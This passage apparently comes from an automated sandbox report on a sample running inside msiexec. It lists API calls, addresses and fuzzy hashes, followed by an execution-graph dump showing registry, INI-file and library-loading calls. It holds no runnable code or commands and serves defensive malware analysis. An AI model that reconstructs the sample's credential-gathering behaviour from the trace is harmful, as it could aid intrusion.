                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: free$memcpy$mallocwcslen
                                                                                          • String ID:
                                                                                          • API String ID: 726966127-0
                                                                                          • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                          • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                          • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                          • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                          APIs
                                                                                          • wcslen.MSVCRT ref: 0040B1DE
                                                                                          • free.MSVCRT ref: 0040B201
                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                          • free.MSVCRT ref: 0040B224
                                                                                          • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: free$memcpy$mallocwcslen
                                                                                          • String ID:
                                                                                          • API String ID: 726966127-0
                                                                                          • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                          • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                          • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                          • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                          APIs
                                                                                          • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                            • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                            • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                            • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                          • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                          • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                          • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcmp$memcpy
                                                                                          • String ID:
                                                                                          • API String ID: 231171946-0
                                                                                          • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                          • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                          • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                          • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                          APIs
                                                                                          • strlen.MSVCRT ref: 0040B0D8
                                                                                          • free.MSVCRT ref: 0040B0FB
                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                          • free.MSVCRT ref: 0040B12C
                                                                                          • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: free$memcpy$mallocstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 3669619086-0
                                                                                          • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                          • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                          • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                          • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                          APIs
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??2@
                                                                                          • String ID:
                                                                                          • API String ID: 1033339047-0
                                                                                          • Opcode ID: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                          • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                          • Opcode Fuzzy Hash: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                          • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                          • malloc.MSVCRT ref: 00417407
                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                          • free.MSVCRT ref: 00417425
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$freemalloc
                                                                                          • String ID:
                                                                                          • API String ID: 2605342592-0
                                                                                          • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                          • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                          • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                          • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcslen$wcscat$wcscpy
                                                                                          • String ID:
                                                                                          • API String ID: 1961120804-0
                                                                                          • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                          • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                          • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                          • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                          Execution Graph

                                                                                          Execution Coverage:2.1%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:0.5%
                                                                                          Total number of Nodes:762
                                                                                          Total number of Limit Nodes:20
                                                                                          execution_graph 34007 40fc40 70 API calls 34182 403640 21 API calls 34008 427fa4 42 API calls 34183 412e43 _endthreadex 34184 425115 76 API calls __fprintf_l 34185 43fe40 133 API calls 34011 425115 83 API calls __fprintf_l 34012 401445 memcpy memcpy DialogBoxParamA 34013 440c40 34 API calls 33228 444c4a 33247 444e38 33228->33247 33230 444c56 GetModuleHandleA 33231 444c68 __set_app_type __p__fmode __p__commode 33230->33231 33233 444cfa 33231->33233 33234 444d02 __setusermatherr 33233->33234 33235 444d0e 33233->33235 33234->33235 33248 444e22 _controlfp 33235->33248 33237 444d13 _initterm __getmainargs _initterm 33238 444d6a GetStartupInfoA 33237->33238 33240 444d9e GetModuleHandleA 33238->33240 33249 40cf44 33240->33249 33244 444dcf _cexit 33246 444e04 33244->33246 33245 444dc8 exit 33245->33244 33247->33230 33248->33237 33300 404a99 LoadLibraryA 33249->33300 33251 40cf64 33251->33244 33251->33245 33252 40cf60 33252->33251 33308 410d0e 33252->33308 33254 40cf6f 33312 40ccd7 ??2@YAPAXI 33254->33312 33256 40cf9b 33326 407cbc 33256->33326 33261 40cfc4 33345 409825 memset 33261->33345 33262 40cfd8 33350 4096f4 memset 33262->33350 33267 40d181 ??3@YAXPAX 33269 40d1b3 33267->33269 33270 40d19f DeleteObject 33267->33270 33268 407e30 _strcmpi 33271 40cfee 33268->33271 33374 407948 free free 33269->33374 33270->33269 33273 40cff2 RegDeleteKeyA 33271->33273 33274 40d007 EnumResourceTypesA 33271->33274 33273->33267 33276 40d047 33274->33276 33277 40d02f MessageBoxA 33274->33277 33275 40d1c4 33375 4080d4 free 33275->33375 33278 40d0a0 CoInitialize 33276->33278 33355 40ce70 33276->33355 33277->33267 33372 40cc26 strncat memset RegisterClassA CreateWindowExA 33278->33372 33282 40d1cd 33376 407948 free free 33282->33376 33284 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33373 40c256 PostMessageA 33284->33373 33286 40d061 ??3@YAXPAX 33286->33269 33289 40d084 DeleteObject 33286->33289 33287 40d09e 33287->33278 33289->33269 33292 40d0f9 GetMessageA 33293 40d17b CoUninitialize 33292->33293 33294 40d10d 33292->33294 33293->33267 33295 40d113 TranslateAccelerator 33294->33295 33297 40d145 IsDialogMessage 33294->33297 33298 40d139 IsDialogMessage 33294->33298 33295->33294 33296 40d16d GetMessageA 33295->33296 33296->33293 33296->33295 33297->33296 33299 40d157 TranslateMessage DispatchMessageA 33297->33299 33298->33296 33298->33297 33299->33296 33301 404ac4 GetProcAddress 33300->33301 33302 404aec 33300->33302 33303 404add FreeLibrary 33301->33303 33305 404ad4 33301->33305 33306 404b13 33302->33306 33307 404afc MessageBoxA 33302->33307 33303->33302 33304 404ae8 33303->33304 33304->33302 33305->33303 33306->33252 33307->33252 33309 410d17 LoadLibraryA 33308->33309 33310 410d3c 33308->33310 33309->33310 33311 410d2b GetProcAddress 33309->33311 33310->33254 33311->33310 33313 40cd08 ??2@YAPAXI 33312->33313 33315 40cd26 33313->33315 33317 40cd2d 33313->33317 33384 404025 6 API calls 33315->33384 33318 40cd66 33317->33318 33319 40cd59 DeleteObject 33317->33319 33377 407088 33318->33377 33319->33318 33321 40cd6b 33380 4019b5 33321->33380 33324 4019b5 strncat 33325 40cdbf _mbscpy 33324->33325 33325->33256 33386 407948 free free 33326->33386 33328 407e04 33387 407a55 33328->33387 33331 407a1f malloc memcpy free free 33333 407cf7 33331->33333 33332 407ddc 33332->33328 33392 407a1f 33332->33392 33333->33328 33333->33331 33333->33332 33335 407d83 33333->33335 33336 407d7a free 33333->33336 33390 40796e 7 API calls 33333->33390 33335->33333 33391 406f30 malloc memcpy free 33335->33391 33336->33333 33341 407e30 33342 407e38 33341->33342 33344 407e57 33341->33344 33343 407e41 _strcmpi 33342->33343 33342->33344 33343->33342 33343->33344 33344->33261 33344->33262 33400 4097ff 33345->33400 33347 409854 33405 409731 33347->33405 33351 4097ff 3 API calls 33350->33351 33352 409723 33351->33352 33425 40966c 33352->33425 33439 4023b2 33355->33439 33361 40ced3 33523 40cdda 7 API calls 33361->33523 33362 40cece 33365 40cf3f 33362->33365 33476 40c3d0 memset GetModuleFileNameA strrchr 33362->33476 33365->33286 33365->33287 33368 40ceed 33502 40affa 33368->33502 33372->33284 33373->33292 33374->33275 33375->33282 33376->33251 33385 406fc7 memset _mbscpy 33377->33385 33379 40709f CreateFontIndirectA 33379->33321 33381 4019e1 33380->33381 33382 4019c2 strncat 33381->33382 33383 4019e5 memset LoadIconA 33381->33383 33382->33381 33383->33324 33384->33317 33385->33379 33386->33333 33388 407a65 33387->33388 33389 407a5b free 33387->33389 33388->33341 33389->33388 33390->33333 33391->33335 33393 407a38 33392->33393 33394 407a2d free 33392->33394 33399 406f30 malloc memcpy free 33393->33399 33396 407a44 33394->33396 33398 40796e 7 API calls 33396->33398 33397 407a43 33397->33396 33398->33328 33399->33397 33416 406f96 GetModuleFileNameA 33400->33416 33402 409805 strrchr 33403 409814 33402->33403 33404 409817 _mbscat 33402->33404 33403->33404 33404->33347 33417 44b090 33405->33417 33410 40930c 3 API calls 33411 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33410->33411 33412 4097c5 LoadStringA 33411->33412 33413 4097db 33412->33413 33413->33412 33414 4097f3 33413->33414 33424 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33413->33424 33414->33267 33416->33402 33418 40973e _mbscpy _mbscpy 33417->33418 33419 40930c 33418->33419 33420 44b090 33419->33420 33421 409319 memset GetPrivateProfileStringA 33420->33421 33422 409374 33421->33422 33423 409364 WritePrivateProfileStringA 33421->33423 33422->33410 33423->33422 33424->33413 33435 406f81 GetFileAttributesA 33425->33435 33427 409675 33428 4096ee 33427->33428 33429 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33427->33429 33428->33268 33436 409278 GetPrivateProfileStringA 33429->33436 33431 4096c9 33437 409278 GetPrivateProfileStringA 33431->33437 33433 4096da 33438 409278 GetPrivateProfileStringA 33433->33438 33435->33427 33436->33431 33437->33433 33438->33428 33525 409c1c 33439->33525 33442 401e69 memset 33564 410dbb 33442->33564 33445 401ec2 33588 4070e3 strlen _mbscat _mbscpy _mbscat 33445->33588 33446 401ed4 33577 406f81 GetFileAttributesA 33446->33577 33449 401ee6 strlen strlen 33451 401f15 33449->33451 33452 401f28 33449->33452 33589 4070e3 strlen _mbscat _mbscpy _mbscat 33451->33589 33578 406f81 GetFileAttributesA 33452->33578 33455 401f35 33579 401c31 33455->33579 33458 401f75 33460 402165 33458->33460 33461 401f9c memset 33458->33461 33459 401c31 5 API calls 33459->33458 33463 402195 ExpandEnvironmentStringsA 33460->33463 33464 4021a8 _strcmpi 33460->33464 33590 410b62 RegEnumKeyExA 33461->33590 33596 406f81 GetFileAttributesA 33463->33596 33464->33361 33464->33362 33465 401fc9 33465->33460 33467 401fd9 atoi 33465->33467 33471 402076 memset memset strlen strlen 33465->33471 33472 4070e3 strlen _mbscat _mbscpy _mbscat 33465->33472 33473 4020dd strlen strlen 33465->33473 33474 406f81 GetFileAttributesA 33465->33474 33475 402167 _mbscpy 33465->33475 33595 410b62 RegEnumKeyExA 33465->33595 33467->33465 33468 401fef memset memset sprintf 33467->33468 33591 410b1e 33468->33591 33471->33465 33472->33465 33473->33465 33474->33465 33475->33460 33477 40c422 33476->33477 33478 40c425 _mbscat _mbscpy _mbscpy 33476->33478 33477->33478 33479 40c49d 33478->33479 33480 40c512 33479->33480 33481 40c502 GetWindowPlacement 33479->33481 33482 40c538 33480->33482 33614 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33480->33614 33481->33480 33607 409b31 33482->33607 33486 40ba28 33487 40ba87 33486->33487 33493 40ba3c 33486->33493 33617 406c62 LoadCursorA SetCursor 33487->33617 33489 40ba8c 33618 403c16 33489->33618 33684 4107f1 33489->33684 33687 404734 33489->33687 33695 404785 33489->33695 33490 40ba43 _mbsicmp 33490->33493 33491 40baa0 33492 407e30 _strcmpi 33491->33492 33496 40bab0 33492->33496 33493->33487 33493->33490 33698 40b5e5 10 API calls 33493->33698 33494 40bafa SetCursor 33494->33368 33496->33494 33497 40baf1 qsort 33496->33497 33497->33494 33991 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33502->33991 33504 40b00e 33505 40b016 33504->33505 33506 40b01f GetStdHandle 33504->33506 33992 406d1a CreateFileA 33505->33992 33508 40b01c 33506->33508 33509 40b035 33508->33509 33510 40b12d 33508->33510 33993 406c62 LoadCursorA SetCursor 33509->33993 33997 406d77 9 API calls 33510->33997 33513 40b136 33524 40c580 28 API calls 33513->33524 33514 40b042 33515 40b087 33514->33515 33521 40b0a1 33514->33521 33994 40a57c strlen WriteFile 33514->33994 33515->33521 33995 40a699 12 API calls 33515->33995 33518 40b0d6 33519 40b116 CloseHandle 33518->33519 33520 40b11f SetCursor 33518->33520 33519->33520 33520->33513 33521->33518 33996 406d77 9 API calls 33521->33996 33523->33362 33524->33365 33537 409a32 33525->33537 33528 409c80 memcpy memcpy 33529 409cda 33528->33529 33529->33528 33530 408db6 12 API calls 33529->33530 33531 409d18 ??2@YAPAXI ??2@YAPAXI 33529->33531 33530->33529 33532 409d54 ??2@YAPAXI 33531->33532 33535 409d8b 33531->33535 33532->33535 33547 409b9c 33535->33547 33536 4023c1 33536->33442 33538 409a44 33537->33538 33539 409a3d ??3@YAXPAX 33537->33539 33540 409a52 33538->33540 33541 409a4b ??3@YAXPAX 33538->33541 33539->33538 33542 409a63 33540->33542 33543 409a5c ??3@YAXPAX 33540->33543 33541->33540 33544 409a83 ??2@YAPAXI ??2@YAPAXI 33542->33544 33545 409a73 ??3@YAXPAX 33542->33545 33546 409a7c ??3@YAXPAX 33542->33546 33543->33542 33544->33528 33545->33546 33546->33544 33548 407a55 free 33547->33548 33549 409ba5 33548->33549 33550 407a55 free 33549->33550 33551 409bad 33550->33551 33552 407a55 free 33551->33552 33553 409bb5 33552->33553 33554 407a55 free 33553->33554 33555 409bbd 33554->33555 33556 407a1f 4 API calls 33555->33556 33557 409bd0 33556->33557 33558 407a1f 4 API calls 33557->33558 33559 409bda 33558->33559 33560 407a1f 4 API calls 33559->33560 33561 409be4 33560->33561 33562 407a1f 4 API calls 33561->33562 33563 409bee 33562->33563 33563->33536 33565 410d0e 2 API calls 33564->33565 33566 410dca 33565->33566 33567 410dfd memset 33566->33567 33597 4070ae 33566->33597 33570 410e1d 33567->33570 33571 410e7f _mbscpy 33570->33571 33600 410d3d _mbscpy 33570->33600 33573 401e9e strlen strlen 33571->33573 33573->33445 33573->33446 33574 410e5b 33601 410add RegQueryValueExA 33574->33601 33576 410e73 33576->33571 33577->33449 33578->33455 33580 401c4c 33579->33580 33587 401ca1 33580->33587 33602 410add RegQueryValueExA 33580->33602 33582 401c6a 33583 401c71 strchr 33582->33583 33582->33587 33584 401c85 strchr 33583->33584 33583->33587 33585 401c94 33584->33585 33584->33587 33603 406f06 strlen 33585->33603 33587->33458 33587->33459 33588->33446 33589->33452 33590->33465 33592 410b34 33591->33592 33593 410b4c 33592->33593 33606 410add RegQueryValueExA 33592->33606 33593->33465 33595->33465 33596->33464 33598 4070bd GetVersionExA 33597->33598 33599 4070ce 33597->33599 33598->33599 33599->33567 33599->33573 33600->33574 33601->33576 33602->33582 33604 406f17 33603->33604 33605 406f1a memcpy 33603->33605 33604->33605 33605->33587 33606->33593 33608 409b40 33607->33608 33610 409b4e 33607->33610 33615 409901 memset SendMessageA 33608->33615 33611 409b99 33610->33611 33612 409b8b 33610->33612 33611->33486 33616 409868 SendMessageA 33612->33616 33614->33482 33615->33610 33616->33611 33617->33489 33619 4107f1 FreeLibrary 33618->33619 33620 403c30 LoadLibraryA 33619->33620 33621 403c74 33620->33621 33622 403c44 GetProcAddress 33620->33622 33623 4107f1 FreeLibrary 33621->33623 33622->33621 33624 403c5e 33622->33624 33625 403c7b 33623->33625 33624->33621 33628 403c6b 33624->33628 33626 404734 3 API calls 33625->33626 33627 403c86 33626->33627 33699 4036e5 33627->33699 33628->33625 33631 4036e5 27 API calls 33632 403c9a 33631->33632 33633 4036e5 27 API calls 33632->33633 33634 403ca4 33633->33634 33635 4036e5 27 API calls 33634->33635 33636 403cae 33635->33636 33711 4085d2 33636->33711 33642 403cd2 33644 403cf7 33642->33644 33863 402bd1 37 API calls 33642->33863 33645 403d1c 33644->33645 33864 402bd1 37 API calls 33644->33864 33746 402c5d 33645->33746 33649 4070ae GetVersionExA 33650 403d31 33649->33650 33652 403d61 33650->33652 33865 402b22 42 API calls 33650->33865 33654 403d97 33652->33654 33866 402b22 42 API calls 33652->33866 33655 403dcd 33654->33655 33867 402b22 42 API calls 33654->33867 33758 410808 33655->33758 33659 404785 FreeLibrary 33660 403de8 33659->33660 33762 402fdb 33660->33762 33663 402fdb 29 API calls 33664 403e00 33663->33664 33774 4032b7 33664->33774 33673 403e3b 33675 403e73 33673->33675 33676 403e46 _mbscpy 33673->33676 33821 40fb00 33675->33821 33869 40f334 333 API calls 33676->33869 33685 410807 33684->33685 33686 4107fc FreeLibrary 33684->33686 33685->33491 33686->33685 33688 404785 FreeLibrary 33687->33688 33689 40473b LoadLibraryA 33688->33689 33690 40474c GetProcAddress 33689->33690 33691 40476e 33689->33691 33690->33691 33693 404764 33690->33693 33692 404781 33691->33692 33694 404785 FreeLibrary 33691->33694 33692->33491 33693->33691 33694->33692 33696 4047a3 33695->33696 33697 404799 FreeLibrary 33695->33697 33696->33491 33697->33696 33698->33493 33700 4037c5 33699->33700 33701 4036fb 33699->33701 33700->33631 33870 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33701->33870 33703 40370e 33703->33700 33704 403716 strchr 33703->33704 33704->33700 33705 403730 33704->33705 33871 4021b6 memset 33705->33871 33707 40373f _mbscpy _mbscpy strlen 33708 4037a4 _mbscpy 33707->33708 33709 403789 sprintf 33707->33709 33872 4023e5 16 API calls 33708->33872 33709->33708 33712 4085e2 33711->33712 33873 4082cd 11 API calls 33712->33873 33714 4085ec 33715 403cba 33714->33715 33716 40860b memset 33714->33716 33723 40821d 33715->33723 33875 410b62 RegEnumKeyExA 33716->33875 33718 40865c memset 33876 410add RegQueryValueExA 33718->33876 33721 408637 33721->33715 33721->33718 33877 40848b 10 API calls 33721->33877 33878 410b62 RegEnumKeyExA 33721->33878 33724 40823f 33723->33724 33725 403cc6 33724->33725 33726 408246 memset 33724->33726 33731 4086e0 33725->33731 33879 410b62 RegEnumKeyExA 33726->33879 33728 40826f 33728->33725 33880 4080ed 11 API calls 33728->33880 33881 410b62 RegEnumKeyExA 33728->33881 33882 4045db 33731->33882 33733 4088ef 33890 404656 33733->33890 33737 408737 wcslen 33737->33733 33743 40876a 33737->33743 33738 40877a wcsncmp 33738->33743 33740 404734 3 API calls 33740->33743 33741 404785 FreeLibrary 33741->33743 33742 408812 memset 33742->33743 33744 40883c memcpy wcschr 33742->33744 33743->33733 33743->33738 33743->33740 33743->33741 33743->33742 33743->33744 33745 4088c3 LocalFree 33743->33745 33893 40466b _mbscpy 33743->33893 33744->33743 33745->33743 33747 402c7a 33746->33747 33748 402d9a 33747->33748 33749 402c87 memset 33747->33749 33748->33649 33894 410b62 RegEnumKeyExA 33749->33894 33751 410b1e RegQueryValueExA 33752 402ce4 memset sprintf 33751->33752 33754 402cb2 33752->33754 33753 402d3a sprintf 33753->33754 33754->33748 33754->33751 33754->33753 33895 402bd1 37 API calls 33754->33895 33896 402bd1 37 API calls 33754->33896 33897 410b62 RegEnumKeyExA 33754->33897 33759 410816 33758->33759 33760 4107f1 FreeLibrary 33759->33760 33761 403ddd 33760->33761 33761->33659 33763 402ff9 33762->33763 33764 403006 memset 33763->33764 33765 403122 33763->33765 33898 410b62 RegEnumKeyExA 33764->33898 33765->33663 33767 410b1e RegQueryValueExA 33768 403058 memset sprintf 33767->33768 33773 403033 33768->33773 33769 4030a2 memset 33899 410b62 RegEnumKeyExA 33769->33899 33770 410b62 RegEnumKeyExA 33770->33773 33773->33765 33773->33767 33773->33769 33773->33770 33900 402db3 24 API calls 33773->33900 33775 4032d5 33774->33775 33776 4033a9 33774->33776 33901 4021b6 memset 33775->33901 33789 4034e4 memset memset 33776->33789 33778 4032e1 33902 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33778->33902 33780 4032ea 33781 4032f8 memset GetPrivateProfileSectionA 33780->33781 33903 4023e5 16 API calls 33780->33903 33781->33776 33786 40332f 33781->33786 33783 40339b strlen 33783->33776 33783->33786 33785 403350 strchr 33785->33786 33786->33776 33786->33783 33904 4021b6 memset 33786->33904 33905 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33786->33905 33906 4023e5 16 API calls 33786->33906 33790 410b1e RegQueryValueExA 33789->33790 33791 40353f 33790->33791 33792 40357f 33791->33792 33793 403546 _mbscpy 33791->33793 33797 403985 33792->33797 33907 406d55 strlen _mbscat 33793->33907 33795 403565 _mbscat 33908 4033f0 19 API calls 33795->33908 33909 40466b _mbscpy 33797->33909 33801 4039aa 33803 4039ff 33801->33803 33910 40f6e2 33801->33910 33926 40f460 12 API calls 33801->33926 33927 4038e8 21 API calls 33801->33927 33804 404785 FreeLibrary 33803->33804 33805 403a0b 33804->33805 33806 4037ca memset memset 33805->33806 33929 444551 memset 33806->33929 33809 4038e2 33809->33673 33868 40f334 333 API calls 33809->33868 33811 40382e 33812 406f06 2 API calls 33811->33812 33813 403843 33812->33813 33814 406f06 2 API calls 33813->33814 33815 403855 strchr 33814->33815 33816 403884 _mbscpy 33815->33816 33817 403897 strlen 33815->33817 33818 4038bf _mbscpy 33816->33818 33817->33818 33819 4038a4 sprintf 33817->33819 33938 4023e5 16 API calls 33818->33938 33819->33818 33823 40fb10 33821->33823 33822 403e7f 33831 40f96c 33822->33831 33823->33822 33824 40fb55 RegQueryValueExA 33823->33824 33824->33822 33825 40fb84 33824->33825 33826 404734 3 API calls 33825->33826 33827 40fb91 33826->33827 33827->33822 33828 40fc19 LocalFree 33827->33828 33829 40fbdd memcpy memcpy 33827->33829 33828->33822 33942 40f802 7 API calls 33829->33942 33832 4070ae GetVersionExA 33831->33832 33833 40f98d 33832->33833 33834 4045db 7 API calls 33833->33834 33838 40f9a9 33834->33838 33835 40fae6 33836 404656 FreeLibrary 33835->33836 33837 403e85 33836->33837 33843 4442ea memset 33837->33843 33838->33835 33839 40fa13 memset WideCharToMultiByte 33838->33839 33839->33838 33840 40fa43 _strnicmp 33839->33840 33840->33838 33841 40fa5b WideCharToMultiByte 33840->33841 33841->33838 33842 40fa88 WideCharToMultiByte 33841->33842 33842->33838 33844 410dbb 7 API calls 33843->33844 33845 444329 33844->33845 33943 40759e strlen strlen 33845->33943 33850 410dbb 7 API calls 33851 444350 33850->33851 33852 40759e 3 API calls 33851->33852 33853 44435a 33852->33853 33854 444212 64 API calls 33853->33854 33855 444366 memset memset 33854->33855 33856 410b1e RegQueryValueExA 33855->33856 33857 4443b9 ExpandEnvironmentStringsA strlen 33856->33857 33858 4443f4 _strcmpi 33857->33858 33859 4443e5 33857->33859 33860 403e91 33858->33860 33861 44440c 33858->33861 33859->33858 33860->33491 33862 444212 64 API calls 33861->33862 33862->33860 33863->33644 33864->33645 33865->33652 33866->33654 33867->33655 33868->33673 33869->33675 33870->33703 33871->33707 33872->33700 33874 40841c 33873->33874 33874->33714 33875->33721 33876->33721 33877->33721 33878->33721 33879->33728 33880->33728 33881->33728 33883 404656 FreeLibrary 33882->33883 33884 4045e3 LoadLibraryA 33883->33884 33885 404651 33884->33885 33886 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33884->33886 33885->33733 33885->33737 33887 40463d 33886->33887 33888 404643 33887->33888 33889 404656 FreeLibrary 33887->33889 33888->33885 33889->33885 33891 404666 33890->33891 33892 40465c FreeLibrary 33890->33892 33891->33642 33892->33891 33893->33743 33894->33754 33895->33753 33896->33754 33897->33754 33898->33773 33899->33773 33900->33773 33901->33778 33902->33780 33903->33781 33904->33785 33905->33786 33906->33786 33907->33795 33908->33792 33909->33801 33928 40466b _mbscpy 33910->33928 33912 40f6fa 33913 4045db 7 API calls 33912->33913 33914 40f708 33913->33914 33915 404734 3 API calls 33914->33915 33920 40f7e2 